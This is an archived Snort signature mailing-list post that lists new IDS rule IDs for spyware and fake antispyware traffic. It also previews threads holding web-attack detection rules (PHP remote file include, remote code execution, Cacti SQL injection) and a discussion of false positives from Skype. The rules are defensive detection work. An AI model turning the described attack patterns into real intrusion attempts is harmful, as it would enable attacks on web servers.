osdir.com
mailing list archive

Subject: Loads of new Spyware Signatures - msg#00183

List: security.ids.snort.bleedingsnort

Date: Prev Next Index Thread: Prev Next Index
Cranked out a bunch of sigs for spyware, mostly from the spyware
listening post data. Proving to be very useful, if not overwhelming.
Also got some new stuff from a Checkpoint page:

http://www.checkpoint.com/securitycafe/readingroom/web_security/top_10_spyware_sites.html

There are a number there we donât have coverage for. If youâre looking
to learn something about the spyware sigs, go to one of those sites in
vmware and wireshark the traffic, and install whatever they push.

Here are the new ones today:

2003335 || BLEEDING-EDGE MALWARE 2search.org User Agent (2search)
2003336 || BLEEDING-EDGE MALWARE AntiVermins.com Fake Antispyware
Package User Agent
2003337 || BLEEDING-EDGE MALWARE www.paretologic.com Suspect
Anti-Spyware AutoUpdate User Agent (Autoupdate)
2003338 || BLEEDING-EDGE MALWARE Paretologic Xoftspy Fake Antispyware Update
2003339 || BLEEDING-EDGE MALWARE Paretologic Xoftspy Fake Antispyware Update
2003340 || BLEEDING-EDGE MALWARE Baidu.com Spyware Bar Reporting ||
url,www.pctools.com/mrc/infections/id/BaiDu/
2003341 || BLEEDING-EDGE MALWARE Baidu.com Spyware Bar Pulling Content
|| url,www.pctools.com/mrc/infections/id/BaiDu/
2003342 || BLEEDING-EDGE MALWARE www.baidu.com Spyware User Agent (bar-get)
2003343 || BLEEDING-EDGE MALWARE CNSMin Spyware User Agent (CnsMin Agent)
2003344 || BLEEDING-EDGE MALWARE Trinityacquisitions.com and
Maximumexperience.com Spyware Activity
2003345 || BLEEDING-EDGE MALWARE Download UBAgent User Agent - lop.com
and other spyware || url,www.spywareinfo.com/articles/lop/
2003346 || BLEEDING-EDGE MALWARE Errorsafe.com Fake antispyware User
Agent (ErrorSafe Updater) || url,www.spywareinfo.com/articles/lop/
2003347 || BLEEDING-EDGE MALWARE Gamehouse.com User Agent
(GAMEHOUSE.NET.URL) || url,www.spywareinfo.com/articles/lop/
2003348 || BLEEDING-EDGE MALWARE Gamehouse.com Activity ||
url,www.gamehouse.com



--
--------------------------------------------
Matthew Jonkman
Bleeding Edge Threats
765-429-0398
765-807-3060 fax
http://www.bleedingthreats.net
--------------------------------------------

PGP: http://www.bleedingthreats.com/mattjonkman.asc


Was this page helpful?
Yes No
Thread at a glance:

Previous Message by Date: click to view message preview

Re: Stormy P2P bot Sigs -- may be SKYPE ?

Matt Jonkman wrote: > Russell Fulton wrote: > >> Hmmmm... My edonkey alerts have gone crazy recently. I know that at >> least some of the machines (the ones I checked ) are not doing any p2p >> file sharing, nor is there any signs of infection or compromise. All 3 >> however were running Skype. Is it possible that changes have been made >> to the skype protocol which results in a lot of packets with 0XE3 at the >> start? >> > > Looked into some basic skype pcaps and they shouldn't be triggering the > edonkey sigs. Could skype be using edonkey to pull updates or something? > > Could you turn off skype on a few of those and see if the hits persist? > We don't have direct control of the machines and skype is perfectly legal on our network. I'll examine my argus logs and see if I can get something I that I can positively identify as SKYPE. There are a few IPs that they contact at the start of a session IIRC. Russell

Next Message by Date: click to view message preview

Re: Stormy P2P bot Sigs -- may be SKYPE ?

Those rules are new... but on the flip side, I've not been able to get them to trip on intentional skype traffic here. I am wondering more if skype is using edonkey to pull updates or something, but my client isn't needing an update? Matt Russell Fulton wrote: > > Matt Jonkman wrote: >> Ummm... that's a little scary. >> >> To be honest, when I was looking at those stormy variants the traffic >> didn't exactly conform to edonkey, but was close. It's VERY possible it >> may have been skype and I've written for the wrong protocol. >> >> Let me look into it and see what'll match. Anyone else seeing skype hits? >> > > I've just followed up another machine that was getting lots of hits. > This machine belongs to a senior physics professor who I have known for > years. There is no Edonkey or other file sharing p2p software on the > box and since it is a Mac it is unlikely to be infected with peacomm ;) > and he was using SKYPE at the time of my alerts. > > I suspect that the p2p rules are not widely used and those that do > monitor for p2p also ban SKYPE which we don't. > > What puzzles me is why this has just started happening -- or are these > rules new? > > > Russell. > _______________________________________________ > Bleeding-sigs mailing list > Bleeding-sigs-WwB1pFISwSkm7effSn6vN9HuzzzSOjJt@xxxxxxxxxxxxxxxx > http://lists.bleedingthreats.net/cgi-bin/mailman/listinfo/bleeding-sigs -- -------------------------------------------- Matthew Jonkman Bleeding Edge Threats 765-429-0398 765-807-3060 fax http://www.bleedingthreats.net -------------------------------------------- PGP: http://www.bleedingthreats.com/mattjonkman.asc

Previous Message by Thread: click to view message preview

New Web Sigs

David Maciejak has been busy this morning. Four new sigs out. Thanks David. alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE EXPLOIT GuppY error.php POST Arbitrary Remote Code Execution"; flow: to_server,established; content:"POST"; depth:4; nocase; uricontent:"/error.php?"; nocase; uricontent:"err="; nocase; pcre:"/Cookie\:\ +REMOTE_ADDR=/i"; reference:bugtraq,15609; classtype:web-application-attack; sid:2003332; rev:1;) alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE WEB PHP Generic membreManager.php remote file include"; flow:established,to_server; uricontent:"/membres/membreManager.php"; nocase; pcre:"/include_path=\s*(ftp|https?)\:\//Ui"; reference:bugtraq,22287; classtype:web-application-attack; sid:2003331; rev:1;) alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE WEB PHP Gnopaster Common.php remote file include"; flow:established,to_server; uricontent:"/includes/common.php"; nocase; pcre:"/root_path=\s*(ftp|https?)\:\//Ui"; reference:bugtraq,18180; classtype:web-application-attack; sid:2003333; rev:1;) alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"BLEEDING-EDGE WEB Cacti cmd.php Remote Arbitrary SQL Command Execution Attempt"; flow:to_server,established; uricontent:"/cmd.php?"; nocase; uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase; ref erence:cve,CVE-2006-6799; reference:bugtraq,21799; classtype: web-application-attack; sid:2003334; rev:1;) -- -------------------------------------------- Matthew Jonkman Bleeding Edge Threats 765-429-0398 765-807-3060 fax http://www.bleedingthreats.net -------------------------------------------- PGP: http://www.bleedingthreats.com/mattjonkman.asc

Next Message by Thread: click to view message preview

IDS Policy Manager v2.0.2 Released

>From the Activeworx guys: Activeworx is happy to announce the release of IDS Policy Manager v2.0.2. This completely free tool has been updated to expand on its already feature rich interface to add more usability features and support for Snort v2.7beta. Partial list of changes since 2.0.1: o. Added - Support for Snort v2.7beta. o. Added - Show differences between rules when updating rules. o. Added - Stream 5 support. o. Added - Local script arguments. o. Added - Import configuration options/rules from a text box. o. Added - Ability to quickly open selected rule for all policies. o. Added - Additional checks to make sure user is entering required values for rules, sensors, groups, etcâ For more information and to download IDS Policy Manager for free, please visit: http://www.activeworx.org/ -- -------------------------------------------- Matthew Jonkman Bleeding Edge Threats 765-429-0398 765-807-3060 fax http://www.bleedingthreats.net -------------------------------------------- PGP: http://www.bleedingthreats.com/mattjonkman.asc
Sign up for updates to this mailing list. email:
Loading Comments...
Home | News | Patents | Sitemap | FAQ | advertise

Advertising by